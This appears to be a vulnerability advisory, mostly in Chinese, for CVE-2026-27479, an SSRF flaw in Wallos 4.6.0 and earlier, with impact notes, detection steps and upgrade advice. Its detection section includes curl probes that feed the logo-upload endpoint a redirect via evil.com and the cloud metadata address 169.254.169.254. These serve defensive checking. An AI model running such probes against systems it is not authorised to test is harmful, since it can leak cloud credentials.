CVE-2026-27479 是 Wallos 订阅跟踪器中的一个服务器端请求伪造 (SSRF) 漏洞。该漏洞允许攻击者绕过 IP 地址验证,从而访问内部资源,例如云实例元数据端点。该漏洞影响 Wallos 4.6.0 及更早版本。已发布 4.6.1 版本来修复此漏洞。
攻击者可以利用此 SSRF 漏洞访问 Wallos 服务器内部的敏感信息。通过利用 HTTP 重定向 (CURLOPT_FOLLOWLOCATION = true),攻击者可以绕过 IP 地址验证,并访问云实例元数据端点,从而获取云实例的配置信息、API 密钥和其他敏感数据。这可能导致未经授权的访问、数据泄露,甚至可能导致对底层基础设施的控制。类似于其他 SSRF 漏洞,攻击者可能利用此漏洞扫描内部网络,发现其他潜在漏洞。
此漏洞已公开披露,且存在利用的可能性。目前尚未观察到大规模的利用活动,但由于其易于利用,建议尽快采取缓解措施。该漏洞尚未被添加到 CISA KEV 目录中。公开的 PoC 可能存在,因此建议密切关注安全社区的动态。
Organizations utilizing Wallos for subscription tracking, particularly those hosting the application on cloud platforms like AWS, Azure, or Google Cloud, are at risk. Shared hosting environments where Wallos is installed alongside other applications could also be vulnerable, as a compromise of one application could potentially lead to exploitation of this SSRF vulnerability.
• php: Examine Wallos application logs for unusual outbound HTTP requests, particularly those involving redirects to internal IP addresses or cloud metadata endpoints.
grep 'redirect' /var/log/apache2/access.log | grep '169.254' • generic web: Monitor access logs for requests to the logo upload endpoint with suspicious URL parameters.
curl -I 'http://your-wallos-instance/upload_logo.php?url=http://evil.com/redirect' • generic web: Check response headers for signs of internal resource exposure.
curl -I 'http://your-wallos-instance/upload_logo.php?url=http://169.254.169.254/latest/meta-data/'disclosure
漏洞利用状态
EPSS
0.03% (10% 百分位)
CISA SSVC
解决此漏洞的首要措施是立即升级到 Wallos 4.6.1 版本或更高版本。如果无法立即升级,可以考虑使用 Web 应用防火墙 (WAF) 或反向代理来过滤恶意请求,并阻止对敏感资源的访问。配置 WAF 以阻止 HTTP 重定向,或限制允许的重定向目标。此外,审查 Wallos 的配置,确保其只允许访问必要的内部资源。在升级后,请验证漏洞是否已成功修复,例如通过尝试触发 SSRF 攻击并确认其已被阻止。
将 Wallos 更新到 4.6.1 或更高版本。此版本通过正确验证获取订阅和支付徽标和图标时的 HTTP 重定向来修复 SSRF 漏洞。
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2026-27479 是 Wallos 订阅跟踪器 4.6.0 及更早版本中的一个服务器端请求伪造 (SSRF) 漏洞,允许攻击者访问内部资源。
如果您正在使用 Wallos 订阅跟踪器 4.6.0 或更早版本,则您可能受到此漏洞的影响。
升级到 Wallos 4.6.1 或更高版本以修复此漏洞。
虽然目前尚未观察到大规模利用活动,但由于其易于利用,建议尽快采取缓解措施。
请访问 Wallos 官方网站或 GitHub 仓库,查找关于 CVE-2026-27479 的安全公告。
CVSS 向量